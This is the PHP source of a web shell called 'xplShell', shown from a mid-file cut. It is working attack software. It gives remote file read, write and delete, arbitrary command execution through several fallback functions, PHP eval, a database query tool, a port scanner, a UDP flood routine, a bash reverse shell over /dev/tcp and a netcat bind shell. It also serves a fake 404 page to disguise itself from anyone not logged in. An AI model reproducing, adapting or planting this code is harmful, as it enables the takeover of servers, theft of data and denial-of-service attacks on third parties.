'N/A', 'group' => 'N/A', 'permissions' => 'N/A', ]; } $permissions = substr(decoct($stat['mode']), -3); $owner = function_exists('posix_getpwuid') ? posix_getpwuid($stat['uid']) : null; $group = function_exists('posix_getgrgid') ? posix_getgrgid($stat['gid']) : null; return [ 'owner' => $owner['name'], 'group' => $group['name'], 'permissions' => $permissions, ]; } if (isset($_POST['scan_ports']) && isset($_POST['host']) && isset($_POST['start_port']) && isset($_POST['end_port'])) { $portScanResult = ""; $host = $_POST['host']; $startPort = intval($_POST['start_port']); $endPort = intval($_POST['end_port']); if ($startPort > 0 && $endPort > 0 && $startPort <= $endPort) { $openPorts = scanPorts($host, $startPort, $endPort); if (empty($openPorts)) { $portScanResult = "No open ports in the specified range."; } else { $portScanResult = "Open ports on $host:"; $portScanResult .= "

Port $port is open.

"; } } else { $portScanResult = "Invalid port range."; } } $current_directory = isset($_SESSION['current_directory']) ? $_SESSION['current_directory'] : '.'; $current_directory = realpath($current_directory); $files = scandir($current_directory); if (isset($_POST['action'])) { $action = $_POST['action']; $path = $current_directory; if ($action === 'create_file' && isset($_POST['file_name'])) { $file_name = $_POST['file_name']; file_put_contents($path . '/' . $file_name, ''); } elseif ($action === 'create_directory' && isset($_POST['directory_name'])) { $directory_name = $_POST['directory_name']; mkdir($path . '/' . $directory_name); $_SESSION['current_directory'] = $current_directory . '/' . $directory_name; } elseif ($action === 'delete' && isset($_POST['delpath'])) { if (is_file($path . '/' . $_POST['delpath'])) { unlink($path . '/' . $_POST['delpath']); } elseif (is_dir($path . '/' . $_POST['delpath'])) { rmdir($path . '/' . $_POST['delpath']); } } elseif ($action === 'edit' && isset($_POST['file_to_edit']) && isset($_POST['edited_content'])) { $file_to_edit = $_POST['file_to_edit']; $edited_content = $_POST['edited_content']; file_put_contents($file_to_edit, $edited_content); } elseif ($action === 'load_file' && isset($_POST['path'])) { $file_path = $_POST['path']; echo file_get_contents($file_path); exit(); } elseif ($action === 'navigate_to_directory' && isset($_POST['new_directory'])) { $new_directory = $_POST['new_directory']; $_SESSION['current_directory'] = $new_directory; $path = $new_directory; exit; } } if (isset($_POST['update_card_session'])) { $_SESSION['last_used_card'] = $_POST['update_card_session']; } if (isset($_POST['path'])) { $_SESSION['current_directory'] = $_POST['path']; } if (isset($_POST['command']) && isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true) { $command = $_POST['command']; $output = ''; // Attempt to use shell_exec $output = shell_exec($command); if ($output === null) { // shell_exec doesn't work, try exec exec($command, $output, $execReturnValue); if ($execReturnValue !== 0) { // exec doesn't work, try system $output = array(); system($command, $systemReturnValue); if ($systemReturnValue !== 0) { // system doesn't work, try passthru ob_start(); passthru($command, $passthruReturnValue); $output = ob_get_clean(); if ($passthruReturnValue !== 0) { // passthru doesn't work, try proc_open $descriptors = array( 0 => array('pipe', 'r'), // stdin 1 => array('pipe', 'w'), // stdout 2 => array('pipe', 'w') // stderr ); $process = proc_open($command, $descriptors, $pipes); if (is_resource($process)) { fclose($pipes[0]); // Close stdin $output = stream_get_contents($pipes[1]); fclose($pipes[1]); // Close stdout fclose($pipes[2]); // Close stderr proc_close($process); } } } } } } if (isset($_POST['db_action'])) { $db_action = $_POST['db_action']; $db_host = $_POST['db_host']; $db_user = $_POST['db_user']; $db_password = $_POST['db_password']; $db_name = $_POST['db_name']; $db_connection = new mysqli($db_host, $db_user, $db_password, $db_name); if ($db_connection->connect_error) { die("Database connection error: " . $db_connection->connect_error); } $result = $db_connection->query($db_action); if ($result === false) { $result_output = "Query error: " . $db_connection->error; } else { $result_output .= "

Query results:

"; $result_output .= "

" . $key . ": " . $value . "

"; } $db_connection->close(); } if (isset($_POST['action']) && $_POST['action'] === 'dos_attack') { $targetIp = $_POST['target_ip']; $targetPort = $_POST['target_port']; ignore_user_abort(true); set_time_limit(60); $fs = fsockopen("udp://$targetIp", $targetPort); $attackTime = time() + 60; $data = ''; for ($i = 0; $i < 1500; $i++) { $data .= chr(rand(0, 255)); } while (time() < $attackTime) { fwrite($fs, $data); } fclose($fs); $dosResult = "Denial of Service (DoS) attack completed on $targetIp:$targetPort."; } if (isset($_POST['backconnect_host']) && isset($_POST['backconnect_port'])) { $host = $_POST['backconnect_host']; $port = $_POST['backconnect_port']; $reverseShellCmd = "bash -c 'bash -i >& /dev/tcp/$host/$port 0>&1'"; $revoutput = shell_exec($reverseShellCmd); } if (isset($_POST['bindport_port'])) { $bindport_port = $_POST['bindport_port']; $bindportCmd = "nc -l -p $bindport_port -e /bin/bash"; $bindoutput = shell_exec($bindportCmd); } if (isset($_POST['php_code'])) { ob_start(); eval($_POST['php_code']); $php_output = ob_get_clean(); } $fn=$self; $last_used_card = isset($_POST['selected_card']) ? $_POST['selected_card'] : (isset($_SESSION['last_used_card']) ? $_SESSION['last_used_card'] : 'file_manager'); $_SESSION['last_used_card'] = $last_used_card; if (!isset($_SESSION['logged_in']) || $_SESSION['logged_in'] !== true) { // If the user is not logged in, display the 404 page and exit the script. http_response_code(404); ?> 404 Not Found

Not Found

The requested URL was not found on this server.

Server at Port

xplShell v1.1

File manager

Files

Name	Owner	Group	Chmod

File editor

Command execution

Command Output:

Database manager

Query Results:

PHP Eval

PHP Output:

Port Scanner

Port Scan Results:

Denial of Service (UDP FLOOD Attack)

DoS Attack Result:"; echo "

$dosResult

"; } ?>